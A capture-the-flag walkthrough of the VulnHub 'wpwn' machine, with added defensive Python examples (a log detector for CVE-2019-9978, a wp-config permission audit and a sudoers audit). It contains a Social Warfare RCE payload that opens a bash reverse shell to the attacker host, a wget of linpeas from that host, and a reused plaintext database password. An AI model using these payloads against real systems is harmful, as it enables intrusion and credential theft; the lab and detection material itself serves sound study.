vulnhub wpwn: 1
2022-07-24 00:09:00 【Fairy elephant】
Attack path:
nmap scan ---- gobuster directory scan of the website ---- wpscan finds a vulnerable plugin ---- unauthenticated RCE in the WordPress plugin Social Warfare to get a shell ---- the WordPress configuration file leaks a plaintext password, switch to user takis ---- sudo su to escalate ---- read .bash_history to find the flag
Environment:
Target machine: 192.168.101.87
Attacker machine: 192.168.101.34
Steps:
1、nmap scan
sudo nmap -sV -sC -p- 192.168.101.87
Only TCP ports 22 (ssh) and 80 (http) are open.

2、wpscan finds a vulnerable plugin
Visiting port 80 on the target in a browser shows the following page, which seems to contain nothing useful

A gobuster directory scan finds http://192.168.101.87/wordpress/
gobuster dir -u http://192.168.101.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
http://192.168.101.87/wordpress/ does not load correctly in the browser, so I went straight to wpscan
wpscan --url http://192.168.101.87/wordpress/ -e
The scan found the user admin, but brute-forcing admin's password with wpscan and a few small wordlists found nothing, and rockyou.txt was far too slow, so I gave up on that.

wpscan also found the plugin social-warfare, version 3.5.2

3、Using the RCE vulnerability in the Social Warfare plugin to get a shell (no login required)
Searching exploit-db for "wordpress social" turns up: WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution (WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution - PHP webapps Exploit)

Open it and download the exploit, 46794.py. The downloaded exploit did not work as-is, but it contains a GitHub URL (GitHub - hash3liZer/CVE-2019-9978: CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)), and that page has usage examples

Following the example, start an HTTP server
python2 -m SimpleHTTPServer 80
Create a new file named payload.txt with the following contents
<pre>system('cat /etc/passwd')</pre>

Then run the exploit script. It returned the contents of /etc/passwd, which confirms the vulnerability exists and was exploited successfully
python2 46794.py --target http://192.168.101.87/wordpress/ --payload-uri http://192.168.101.34/payload.txt
Change the command in payload.txt to a bash reverse shell
<pre>system('bash -c "exec bash -i &>/dev/tcp/192.168.101.34/8888 <&1"')</pre>

On the attacker machine, listen on port 8888 with nc
nc -nlvp 8888
Then run the exploit script again to get a reverse shell as www-data on the target
python2 46794.py --target http://192.168.101.87/wordpress/ --payload-uri http://192.168.101.34/payload.txt
Then run the following in the target shell to get a tty
python -c 'import pty; pty.spawn("/bin/bash")'
After getting a shell on the target, first look in /home. There is only one user home directory, takis, and inside /home/takis I found the first flag, user.txt
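From the defender's side, the exploit above leaves a distinctive trace in the web server's access log. The following Python detector is an added example (not part of the original write-up or the linked PoC): it parses Apache combined-format lines and flags requests matching the CVE-2019-9978 pattern, admin-post.php called with swp_debug=load_options and an swp_url pointing at a host other than the site itself. The log lines are constructed for the example, and LOCAL_HOSTS is an assumption about which hosts the site may legitimately reference.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines. The second one has the request shape used to
# exploit CVE-2019-9978 in Social Warfare (the vulnerability behind the PoC the walkthrough
# links): admin-post.php with swp_debug=load_options and an attacker-hosted swp_url.
SAMPLE_LOG = """\
192.168.101.34 - - [24/Jul/2022:00:01:10 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.101.34 - - [24/Jul/2022:00:02:31 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.101.34/payload.txt HTTP/1.1" 200 1844 "-" "python-requests/2.27"
192.168.101.50 - - [24/Jul/2022:00:03:05 +0000] "GET /wordpress/wp-admin/admin-post.php?action=heartbeat HTTP/1.1" 200 21 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Hosts the site may legitimately reference in swp_url; anything else is suspicious.
# Assumed for this site (the target's own address is taken from the walkthrough).
LOCAL_HOSTS = frozenset({"localhost", "127.0.0.1", "192.168.101.87"})


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_social_warfare_rce_attempt(path, local_hosts=LOCAL_HOSTS):
    """True if the request path matches the CVE-2019-9978 pattern with a non-local swp_url."""
    url = urlsplit(path)
    if not url.path.endswith("/wp-admin/admin-post.php"):
        return False
    qs = parse_qs(url.query)
    if qs.get("swp_debug", [""])[0] != "load_options":
        return False
    # A missing host (bare local path) is also treated as suspicious.
    return any(urlsplit(u).hostname not in local_hosts for u in qs.get("swp_url", []))


def find_attempts(log_text, local_hosts=LOCAL_HOSTS):
    """Return the parsed records of every exploit attempt found in the log text."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_social_warfare_rce_attempt(rec["path"], local_hosts):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in find_attempts(SAMPLE_LOG):
        print(f"{rec['ts']} {rec['ip']} -> {rec['path']} (status {rec['status']})")
```

A status of 200 on a flagged line means the plugin served the request, so the host in swp_url should be treated as a likely staging server; the actual fix is upgrading Social Warfare to 3.5.3 or later, which the page's exploit-db title already implies.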

4、The WordPress configuration file leaks the database password; switch to user takis
I looked around in the target shell and could not find a way to escalate, so I downloaded linpeas.sh from the attacker machine into /tmp on the target and ran it
wget http://192.168.101.34/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
From the output, /var/www/html/wordpress/wp-config.php contains the database user name wp_user and password R3&]vzhHmMn9,:-5 in plaintext
define( 'DB_NAME', 'wordpress_db' );
define( 'DB_USER', 'wp_user' );
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
define( 'DB_HOST', 'localhost' );

Port 3306 is also open locally, so the database is probably MySQL. I later tried logging in to MySQL as wp_user, which succeeded, but there was nothing useful in the database.
Try switching to user takis
su - takis
Password: wp_user's database password, R3&]vzhHmMn9,:-5
The switch succeeded.
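Two separate weaknesses made this step work: the database password sits in plaintext in a file the web server account must be able to read, and that same password was reused as takis's login password. The first cannot be removed (WordPress needs the credential), but it can be contained. The following Python audit is an added example (not the page's or WordPress's own code): it parses the define() constants out of a wp-config.php, reports permission bits that are too loose for a credential file, and reminds the reviewer that the DB password is effectively shared with whoever gets a shell as the web server user. The wp-config.php content is constructed from the values shown above; the mode thresholds are an assumption (owner-readable plus group-readable, nothing for others).

```python
import os
import re
import stat
import tempfile

# Constructed wp-config.php excerpt using the values the walkthrough found on the target.
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress_db' );
define( 'DB_USER', 'wp_user' );
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
"""

# Matches define( 'NAME', 'value' ); with single or double quotes and loose spacing.
DEFINE_RE = re.compile(r"""define\(\s*['"]([A-Z_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def parse_defines(text):
    """Return the constants define()'d in a wp-config.php as a dict."""
    return dict(DEFINE_RE.findall(text))


def mode_issues(mode):
    """Permission bits that are too loose for a file holding credentials (assumed policy)."""
    issues = []
    if mode & stat.S_IROTH:
        issues.append("world-readable")
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    if mode & stat.S_IWGRP:
        issues.append("group-writable")
    return issues


def audit_wp_config(path):
    """Return a list of findings for the wp-config.php at `path`."""
    with open(path, encoding="utf-8") as fh:
        consts = parse_defines(fh.read())
    mode = stat.S_IMODE(os.stat(path).st_mode)
    findings = [f"mode {oct(mode)} is {issue}" for issue in mode_issues(mode)]
    pw = consts.get("DB_PASSWORD", "")
    if pw:
        # The web server account must read this file, so the DB password is effectively
        # shared with anyone who gets a shell as that account (www-data on this target).
        findings.append(
            f"DB_PASSWORD for {consts.get('DB_USER', '?')} is stored in plaintext "
            f"({len(pw)} chars); it must not double as an OS login password")
    return findings


def demo(mode):
    """Write the constructed sample with the given mode, audit it, and clean up."""
    fd, path = tempfile.mkstemp(suffix="wp-config.php")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_WP_CONFIG)
        os.chmod(path, mode)
        return audit_wp_config(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for line in demo(0o644):
        print(line)
```

Run against a real install as root (or the web server user), `audit_wp_config("/var/www/html/wordpress/wp-config.php")` gives the same checks; the password-reuse finding is a reminder rather than a test, since the only way to verify it is to confirm that no OS account accepts the DB password.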
5、Escalating with sudo su
Check whether takis can run commands with sudo; it turns out takis can run any command as any user
sudo -l
Run the following to escalate to root. However, /root/root.txt does not contain the flag, only a hint: take a look into my USB
sudo su -
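The sudo rule behind this step grants takis ALL commands as ALL users, which is root access with an extra step. As an added example (not from the original post), the Python audit below parses sudoers-style user specifications, flags every non-root principal allowed to run ALL, and formats a least-privilege replacement that lists only the commands a user actually needs. The sample sudoers text is constructed: the takis rule mirrors what sudo -l showed on the target, and the other entries are typical narrower grants added for contrast.

```python
import re

# Constructed sample sudoers content. The takis rule mirrors what `sudo -l` revealed on
# the target; the other entries are typical narrower grants included for contrast.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
takis   ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(www-data) /usr/bin/systemctl restart apache2
Defaults env_reset
"""

# user  hosts=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(?:[A-Z]+:\s*)+")  # strips tags such as NOPASSWD: or SETENV:
SKIP_KEYWORDS = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text):
    """Parse user and group specifications; Defaults, aliases and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.split()[0] in SKIP_KEYWORDS:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = [TAG_RE.sub("", c.strip()) for c in m.group("cmds").split(",")]
        rules.append({
            "user": m.group("user"),
            "hosts": m.group("hosts"),
            # sudoers defaults to root when the (runas) part is omitted
            "runas": m.group("runas") or "root",
            "cmds": cmds,
        })
    return rules


def unrestricted_rules(rules):
    """Rules that let a non-root principal run ALL commands, i.e. root-equivalent access."""
    return [r for r in rules if r["user"] != "root" and "ALL" in r["cmds"]]


def suggest_rule(user, commands, runas="root"):
    """Format a least-privilege replacement listing only the commands actually needed."""
    return f"{user} ALL=({runas}) " + ", ".join(commands)


if __name__ == "__main__":
    for r in unrestricted_rules(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{r['user']} may run ALL as ({r['runas']}): root-equivalent")
    print("suggested:", suggest_rule("takis", ["/usr/bin/systemctl restart apache2"]))
```

Group grants such as %admin are flagged too; on many distributions that one is the intended admin path, so the audit is a review list rather than a verdict. The parser handles the common single-line form only, not line continuations or nested alias expansion.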
6、Reading .bash_history to find the flag
Since there is no USB folder in /root and there were no other clues, I tried checking the .bash_history file, and it did turn something up
cat .bash_history
The highlighted part of the figure below shows that the flag is in the file /usr/games/USB/root

Go into the /usr/games/USB folder; there is indeed a root file, and viewing its contents gives the flag~
